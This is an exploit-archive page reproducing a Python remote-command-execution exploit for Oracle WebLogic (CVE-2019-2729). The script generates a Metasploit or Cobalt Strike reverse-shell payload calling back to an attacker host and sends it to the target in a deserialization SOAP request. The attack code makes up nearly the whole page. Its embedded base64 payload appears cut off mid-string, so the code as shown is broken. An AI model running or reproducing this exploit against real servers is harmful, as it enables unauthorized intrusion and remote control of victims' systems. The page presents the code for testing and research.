Advertisement






Oracle Weblogic 10.3.6.0.0 Remote Command Execution

CVE Category Price Severity
CVE-2019-2729 CWE-78 Unknown High
Author Risk Exploitation Type Date
Jang High Remote 2020-01-09
CPE
cpe:cpe:/a:oracle:weblogic_server:10.3.6.0.0
CVSS EPSS EPSSP
CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 0.8 99.9

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010073

Below is a copy:

Oracle Weblogic 10.3.6.0.0 Remote Command Execution
# Exploit Title: Oracle Weblogic 10.3.6.0.0 - Remote Command Execution
# Date: 2020-01-08
# Exploit Author: Waffles & Paveway3
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0
# Tested on: Windows
# CVE : CVE-2019-2729

SerialLogic.py

# Exploit Title: SerialLogic
# Date: 01-08-2020
# Exploit Author: Waffles & Paveway3
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0
# Tested on: Windows
# CVE : CVE-2019-2729

import argparse
import requests
import sys
import os
import base64

# Colors for terminal output because I likes pretty things
class bcolors:
OKGREEN = '\033[92m'
BOLD = '\033[1m'
NONERED = '\033[91m'
ENDLINE = '\033[0m'
UNDERLINE = '\033[4m'

banner = """\n
   _______    ________    ___   ____ _______       ___  ________  ____ 
  / ____/ |  / / ____/   |__ \ / __ <  / __ \     |__ \/__  /__ \/ __ \
 / /    | | / / __/________/ // / / / / /_/ /_______/ /  / /__/ / /_/ /
/ /___  | |/ / /__/_____/ __// /_/ / /\__, /_____/ __/  / // __/\__, / 
\____/  |___/_____/    /____/\____/_//____/     /____/ /_//____/____/  
"""

print(banner)

parser = argparse.ArgumentParser()
parser.add_argument('-cs', dest='cobaltstrike', default=False, required=False, help="Use Cobalt Strike as callback", action='store_true')
parser.add_argument('-msf', dest='metasploit', default=False, required=False, help="Use Metasploit Handler as callback", action='store_true')
parser.add_argument('-rhost', dest='target_host', default='', required=True, help="Target Host")
parser.add_argument('-rport', dest='target_port', default='', required=True, help="Target Port")
parser.add_argument('-lhost', dest='listen_host', default='', required=True, help="Listening host IP for callback")
parser.add_argument('-lport', dest='listen_port', default='', required=True, help="Listening port for callback")
parser.add_argument('-ssl', dest='usessl', default=False, required=False, help="Use HTTPS instead of HTTP", action='store_true')
args = parser.parse_args()

print("\n")

# Assign user arguments to variables we can use
cobaltstrike = str(args.cobaltstrike) 
metasploit = str(args.metasploit) 
target_host = str(args.target_host) 
target_port = str(args.target_port) 
listen_host = str(args.listen_host) 
listen_port = str(args.listen_port) 
usessl = str(args.usessl)

if cobaltstrike == 'True':
cobaltstrike = True
else:
cobaltstrike = False
if metasploit == 'True':
metasploit = True
else:
metasploit = False
if usessl == 'True':
usessl = True
else:
usessl = False

if metasploit and not cobaltstrike:
os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_MSF.txt > /dev/null 2>&1")
with open('/tmp/CVE_2019_2729_MSF.txt', 'r') as msfcmd:
the_cmd = msfcmd.read()
elif cobaltstrike and not metasploit:
os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_CS.txt > /dev/null 2>&1")
with open('/tmp/CVE_2019_2729_CS.txt', 'r') as cscmd:
the_cmd = cscmd.read()
else:
print("Please try with ONE of the payload options.")
sys.exit()

headers = {
'Content-Type':'text/xml',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0',
'SOAPAction':'',
'lfcmd':'' + the_cmd
}

data_pref = '<?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <array method="forName"> <string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string> <void>'
yss_payload = "CjxhcnJheSBjbGFzcz0iYnl0ZSIgbGVuZ3RoPSI2ODYyIj48dm9pZCBpbmRleD0iMTYwMSI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTM4MSI+PGJ5dGU+NjQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODkzIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEyMzUiPjxieXRlPjk5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTE1Ij48Ynl0ZT4xMDg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMDkyIj48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyNjE5Ij48Ynl0ZT42NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIwOTEiPjxieXRlPjcyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjM1NCI+PGJ5dGU+MTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTY0Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNTc4Ij48Ynl0ZT4xMDQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI4OTciPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE2MjUiPjxieXRlPjEyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjY0MSI+PGJ5dGU+NzI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MjYyIj48Ynl0ZT40NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM3MCI+PGJ5dGU+MTA1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjIxNiI+PGJ5dGU+NzQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MTQ3Ij48Ynl0ZT4xMTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMjU1Ij48Ynl0ZT4xMDk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDQiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE0ODQiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDEwOCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNjQyIj48Ynl0ZT4xMTE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MzE4Ij48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NjUyIj48Ynl0ZT4yMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjYzMjQiPjxieXRlPjI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0OTY1Ij48Ynl0ZT4xMDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MTcxIj48Ynl0ZT40OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2NTIiPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTc4MyI+PGJ5dGU+MTA5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjc2NiI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTU5NCI+PGJ5dGU+MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9Ijk0MiI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDc4NiI+PGJ5dGU+NzY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMzU5Ij48Ynl0ZT4xMTk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MzQxIj48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3NTkiPjxieXRlPjExODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxNDgiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUyNjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjU0MzIiPjxieXRlPjExNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIxMzkiPjxieXRlPjEwNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2Ij48Ynl0ZT4tMzU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTQ4Ij48Ynl0ZT44MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ3ODgiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTU0MSI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1ODgxIj48Ynl0ZT40PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTk0NyI+PGJ5dGU+LTc0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTIzNSI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTQ0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMzNjEiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI5NDciPjxieXRlPjg3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjQwOCI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjE4MyI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTMyMCI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxODEzIj48Ynl0ZT4xMDM8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODA4Ij48Ynl0ZT4xMTI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDMiPjxieXRlPjgzPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDI4NiI+PGJ5dGU+MTE1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTY4OSI+PGJ5dGU+NDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTgwIj48Ynl0ZT42OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxMjEiPjxieXRlPjQ4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzEwMCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MTQyIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUzNyI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNDE3Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0NDk4Ij48Ynl0ZT41OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE5MzciPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjk4NSI+PGJ5dGU+MTA0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTUwMCI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTQ0NyI+PGJ5dGU+NTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzMzA0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUwOTciPjxieXRlPjczPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRl
data = base64.b64decode(yss_payload)
data_payload = data_pref + data.decode()
if usessl:
attackurl = "https://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")
else:
attackurl = "http://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")
res = requests.post(attackurl, headers=headers, data=data_payload, timeout=10)

if cobaltstrike and not metasploit:
cmd_exec = "Cobalt Strike"
elif not cobaltstrike and metasploit:
cmd_exec = "Metasploit"
print(bcolors.OKGREEN + "[+] Command executed was a " + cmd_exec + " Payload, please check your console" + bcolors.ENDLINE)
print(bcolors.OKGREEN + "[+] Cleaning up...." + bcolors.ENDLINE)

if os.path.exists("/tmp/CVE_2019_2729_MSF.txt"):
os.remove("/tmp/CVE_2019_2729_MSF.txt")
elif os.path.exists("/tmp/CVE_2019_2729_CS.txt"):
os.remove("/tmp/CVE_2019_2729_CS.txt")

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum